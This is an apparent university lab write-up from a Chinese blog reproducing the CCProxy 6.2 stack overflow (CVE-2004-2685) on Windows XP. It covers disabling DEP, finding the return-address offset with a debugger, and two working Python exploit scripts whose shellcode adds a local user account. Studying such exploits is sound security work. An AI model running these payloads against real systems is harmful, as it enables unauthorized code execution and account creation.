CVE漏洞攻击——ccproxy溢出

已于 2022-11-11 18:46:20 修改
阅读量4.4k 收藏 6
点赞数 2
分类专栏: 国科大学习 文章标签: 网络安全
于 2022-04-17 18:45:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43840665/article/details/124234085
版权

CCProxy6.2溢出漏洞

虚拟机:VirtualBox 6.1.30
操作系统:WindowsXP SP2
主机OS:Microsoft Windows10
CVE编号:CVE-2004-2685

@author:2021届沈计所 Sen.W

  1. 安装共享文件夹
    按照下面箭头指向程序,然后再虚拟机设置中自动挂载一个主机的共享文件夹

image-20220413203521512
2. 关闭winxp的DEP

  • 使系统显示C:\boot.ini
    image-20220416095545310
  • 修改DEP选项
    image-20220416095740516

  1. 查询虚拟机IP并连接ccproxy

    • 命令提示符中输入ipconfig可以获得ip地址,或者使用127.0.0.1
    • 在命令提示符中telnet 你的虚拟机IP地址 23

  2. 进行崩溃测试

    • ping输入10个a和2000个a
      image-20220413204334340

  3. 安装cdb并用命令提示符打开其所在目录

    • 在目标主机上运行CCProxy
    • 运行cdb –pn ccproxy.exe

  4. 在cdb运行界面输入g,然后重新开启一个cmd,如上面第三步连接到ccproxy上,ping2000个A后,cdb页面可获取到访问非法事件(access violation)
    image-20220413212120793

  5. 我们可以发现esp和esi寄存器也被我们所掌控

    image-20220414085813792

  6. 计算返回地址的思路
    利用一串不重复的字符填充缓冲区,然后查看覆盖RET的字符串,计算它们在整个字符串中的位置,从而得出缓冲区的大小及RET的偏移

    • 安装Perl,替换lib(不是删除,而是替换全部)
      image-20220414094929369
    • 生成2000个模式字符C: \Perl\bin> perl.exe patternCreate.pl 1.txt 2000
    • ping这2000个模式字符
      image-20220414100100764
    • 计算eip的值在整个长为2000的字符串中的偏移
      C: \Perl\bin> perl.exe patternOffset.pl 68423768 2000得到结果1012
      image-20220414102040367
    • dbg命令提示符挂起CCProxy进程后查询jmp esp命令地址
      image-20220414103437420

  7. 使用指向jmp esp命令的地址覆盖返回地址,再把shellcode放置在程序执行JMP ESP指令时ESP指向的地址处,即完成攻击

    • 生成1012个字符:perl.exe patternCreate.pl 1012.txt 1012
    • 再次运行并输入2000个字符,计算程序崩溃时,esp指向的位置内容
      image-20220414111156072
    • perl.exe patternOffset.pl 61413161 2000可以得到偏移为为4

  8. 构造命令字符串
    思路:在1012处的后四个字节为指令的返回地址,将指令的返回地址覆盖为jmp esp,此时的esp指向的是输入字符串的第四个字节,所以在第四个字节开始填充shellcode即可

  • 在ccproxy下的指令:ping + 空格
  • 使用4个\90填充到esp所指向的指令首地址
  • 填充shellcode(增加账户a的shellcode为80个字节)
  • 使用(1012 - 80- 4)个\90填充到第1012处
  • 使用jmp esp命令的地址\x12\x45\xfa\x7f覆盖返回地址
  • 使用91个\90填充到第1107处,如果只填充到1106处不可溢出
import socket
import os

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(('127.0.0.1',23))  #telnet用的是23端口
s = sock.recv(2022)   # 设置接受对方发送的数据字节数量
# 下面80个字符shellcode具有增加a帐户的功能
shellcode = b'\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x0C\xC6\x45\xF0\x6E\xC6\x45\xF1\x65\xC6\x45\xF2\x74\xC6\x45\xF3\x20\xC6\x45\xF4\x75\xC6\x45\xF5\x73\xC6\x45\xF6\x65\xC6\x45\xF7\x72\xC6\x45\xF8\x20\xC6\x45\xF9\x61\xC6\x45\xFA\x20\xC6\x45\xFB\x2F\xC6\x45\xFC\x61\xC6\x45\xFD\x64\xC6\x45\xFE\x64\x8D\x45\xF0\x50\xB8\xC7\x93\xBF\x77\xFF\xD0' 
jmpesp = b'\x12\x45\xfa\x7f'
sendStr = b'ping ' + b'\x90'*4 + shellcode + b'\x90'*(1012-80-4)+ \
          jmpesp + b'\x90'* 91
# 最好填充91个nop原因:命令字符串长度为1107可以溢出,在1106不可溢出,why?
sock.send(sendStr)  #发送shellcode
sock.send(b'\r\n')
s = sock.recv(2022)
print(s)
  1. 其他构造
# 该构造比较短,但是也可以触发CVE漏洞,但是jmp和返回地址后的填充字符串无法解释
import socket
import os
 
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(('127.0.0.1',23))  #telnet用的是23端口
s = sock.recv(2022)   # 设置接受对方发送的数据字节数量
print(s)

# 构造shellcode
sendStr = b'ping ' + b'\x90'*4  # 该漏洞的esp就是指向第四个字节
jmp= b'\xE9\x03\xFC\xFF\xFF\x90\x90\x90'       #从0x012E6700跳到0x012E6308
# shellcode作用是在本地增加一个a帐户
shellcode = b'\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x0C\xC6\x45\xF0\x6E\xC6\x45\xF1\x65\xC6\x45\xF2\x74\xC6\x45\xF3\x20\xC6\x45\xF4\x75\xC6\x45\xF5\x73\xC6\x45\xF6\x65\xC6\x45\xF7\x72\xC6\x45\xF8\x20\xC6\x45\xF9\x61\xC6\x45\xFA\x20\xC6\x45\xFB\x2F\xC6\x45\xFC\x61\xC6\x45\xFD\x64\xC6\x45\xFE\x64\x8D\x45\xF0\x50\xB8\xC7\x93\xBF\x77\xFF\xD0' 
# 为了覆盖返回地址的填充
padding = b'a'*920                
#jmpesp = b'\x12\x45\xfa\x7f'     # 指向jmp esp指令的地址0x7ffa4512覆盖ret
jmpesp = b'\xed\x1e\x96\x7c'
# 末尾至少填充16个字符
sendStr = sendStr+jmp+shellcode+padding+jmpesp +b'a'*16

sock.send(sendStr)                         #发送shellcode
sock.send(b'\n')
s = sock.recv(2022)
print(s)
  1. 攻击实现
    image-20220417183612068

漏洞原因https://blog.csdn.net/m0_46161993/article/details/106255148

CCProxy 6.2 溢出漏洞分析https://blog.csdn.net/daoyikong_x18/article/details/22860717

关闭数据执行保护https://blog.csdn.net/weixin_34078749/article/details/119230382
ps://blog.csdn.net/daoyikong_x18/article/details/22860717

关闭数据执行保护https://blog.csdn.net/weixin_34078749/article/details/119230382

逆羽飘扬
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
缓冲区溢出漏洞攻击演示实验
Mr.Buffoon
10-07 9779
实验内容: 分析缓冲区溢出漏洞,利用CCProxy 6.2的这个缓冲区溢出漏洞,利用ping命令向其发送一个长的字符串,溢出局部变量,覆盖RET的位置,从而实现程序跳转到自己想要让其执行的程序上去。   定位RET   寻找跳转指令地址   构造shellcode   定位shellcode存放位置   编写攻击程序 实验环境: 攻击主机:
weblogic 漏洞统计 CVE
09-18
1.CVE-2016-0696 2.CVE-2016-0700 3.CVE-2016-0675 4.CVE-2016-3416 5.CVE-2016-0688 6.CVE-2016-0638 7.CVE-2015-2623 8.CVE-2015-4744 9.CVE-2014-2480 10.CVE-2014-2481 ...这些漏洞修复情况
CCPROXY漏洞利用
panfengblog
11-02 2063
CCPROXY漏洞利用 CCProxy是一款非常流行的下载量最大的的国产代理服务器软件,其CCProxy 6.2版本存在一个栈溢出漏洞,可以通过此漏洞进行shellcode攻击,以下是学习过程的一个小记录吧 : ) 1.找到并定位溢出点 使用ping命令加一个超长的字符串加一个主机名,代理端会返回Host not found。 当输入的字符串足够长时(比如2000个a),软件就会溢出奔溃,通过二分法尝试,发现ping后最多接1009个字符,第1010字符开始溢出,并且前四字节无用,如下图,当输入
我是如何发现CCProxy远程溢出漏洞
09-26 1510
CCProxy是一个国产的支持HTTP、FTP、Gopher、SOCKS4/5、Telnet、Secure(HTTPS)、News(NNTP)、 RTSP、MMS等代理协议的代理服务器软件。因为其简单易用、界面友好,非常适合在对流量要求不高的网络环境中使用,所以在国内有很多初级的网管喜欢用 这个软件,有时候我在公司上网也要用它做代理。前些日子我测试发现CCProxy 6.0版本存在多处缓冲区溢出
漏洞学习篇:CVE漏洞复现
最新发布
qq_44005305的博客
05-16 757
攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。1、200份很多已经买不到的绝版电子书 2、30G安全大厂内部的视频资料 3、100份src文档 4、常见安全面试题 5、ctf大赛经典题目解析 6、全套工具包 7、应急响应笔记 8、网络安全学习路线。Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。可以看见,apache是49版本的。
使用CCProxy搭建windows系统阿里云socket代理服务器 教程
MZH
06-02 7255
使用CCProxy搭建windows系统阿里云socket代理服务器 教程
使用CCProxy搭建部署linux centos7内网代理上网
weixin_53969394的博客
03-13 6560
使用CCProxy详细搭建部署centos代理上网
CCProxy和Proxifier使用教程
qq_44839815的博客
05-19 1万+
CCProxy使用(服务端): CCProxy运行在需要配置为代理服务器的电脑上 1. 点击设置,按自己需要选择要开的服务: 2. 点击高级,取消勾选"禁止局域网外部用户" 3. 点击账号,进入账号管理,选择允许部分,点击新建新增用户,可以对用户进行自定义配置 4. 服务端配置完成 Proxifier的使用(客户端): Proxifier运行在需要连接代理服务器的电脑上 1. 点击左上角配置文件,点击代理服务器 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gi
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x ...
CPU漏洞分析——Meltdown与Spectre
08-10
018年1月4日,Jann Horn等安全研究者披露了"Meltdown"(CVE-2017-5754)和"Spectre"(CVE-2017-5753 & CVE-2017-5715)两组CPU特性漏洞。相关漏洞利用了芯片硬件层面执行加速机制的实现缺陷实现侧信道攻击,可以间接通过...
外网主机使用CCProxy代理使内网主机上网,通过代理主机访问互联网。
m0_63004677的博客
01-31 2052
背景:在一些企业中或者政务云相关的内网主机都会限制网络访问,内网主机不可直接访问外网,这个时候就需要通过对应的互联网主机作为代理服务器访问外网。如果内网主机和互联网主机都是linux系统,可以通过nginx去代理,但是因为我这个互联网主机是Windows系统,nginx中默认不包含proxy_connect模块,Windows系统编译起来比较麻烦,所以这里就使用了CCProxy作为代理软件来实现,比较简单好操作。我这里内网主机是centos7.9,互联网主机是Windows系统。
CCProxy使用指南
Qbit编程学习笔记
05-16 5996
目标是让一个电脑上安装CCProxy,然后其他电脑也是使用这台电脑上VPN 下载&安装 http://update.youngzsoft.com/ccproxy/update/ccproxysetup.exe 服务端配置 进入设置页面 记住上面的端口,一般HTTP和HTTPS用的比较多,都是808端口 点击上面的高级按钮,选择网络,确保配置正确 git配置 git config --global https.proxy http://vpn.kamputer.online:808 git co
针对CCProxy 6.2缓冲区溢出
flamingobaby的博客
04-15 1487
溢出对象:CCProxy 6.2 调试工具: WinDbg,pattern.py 实验环境: Windows XP sp1或sp2,kali Linux 漏洞说明: CCProxy在代理Telnet协议时,可以接受 Ping命令 。Ping命令格式:ping hostname\r\n 。 当hostname的长度大于或者等于1010字节时,CCProxy 6.2会发生缓冲区溢出,导致程序...
ccproxy使用指南
12-16 9043
目的:虚拟机中需要访问外网,下载东西 开始做一个好运维 2021-12-16 1.ccproxy是什么? CCProxy是一个国产的支持HTTP、FTP、Gopher、SOCKS4/5、 Telnet、Secure(HTTPS)、News(NNTP)、 RTSP、MMS等代理协议的代理服务器软件 2.原理是什么? 对Web客户端来说,代理就是扮演服务器的角色,接受请求报文,返回响应报文。 对Web服务端来说,代理扮演的是客户端角色,发送Web请求报文,接受Web响应报文。 3.window..
CCProxy是个好东西
热门推荐
sinadrew的博客
05-30 10万+
我在之前的博客里提到了用Teamviewer + CCProxy做内网穿透,当时只是简单提了一下,因为发现这种方式网速比较慢。今天又用到了它,虽然慢点,但是总比没的用好,哈哈哈。不得不感叹CCProxy是个好东西,小巧灵活,好多次用学校的ip下论文都靠它的,设置也比较简单。代理上网本质上和代购一样,只要内网机器能访问的网络,你的机器通过代理连上它,就都能远程访问。A. 可以直接使用CCProxy开...
网络安全实验:CCProxy缓冲区溢出攻击
程哥哥的一亩三分地
04-17 6574
CCProxy缓冲区溢出实验 一.实验环境说明 溢出对象:CCProxy(一款代理服务器软件,支持FTP和Telnet) 调试工具:CDB、WinDbg、OllyDBG、IDA Pro etc 实验环境:VMware Workstation Pro、windows xp sp3(关闭dep)、python3、ActivePerl Windows XP SP3关闭DEP的方法:编辑C:\boot.ini文件,将/noexecute=optin 改为 /execute,重启系统 二.测试CCProxy是否存在漏
cppcheck cve漏洞
08-19
Cppcheck本身并不提供CVE漏洞的检测能力。CVE(Common Vulnerabilities and Exposures)是一个公共漏洞和曝光的命名系统,用于标识和跟踪已知的安全漏洞。 然而,Cppcheck可以帮助您检测一些常见的安全问题和代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

逆羽飘扬

如果有用,请支持一下。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值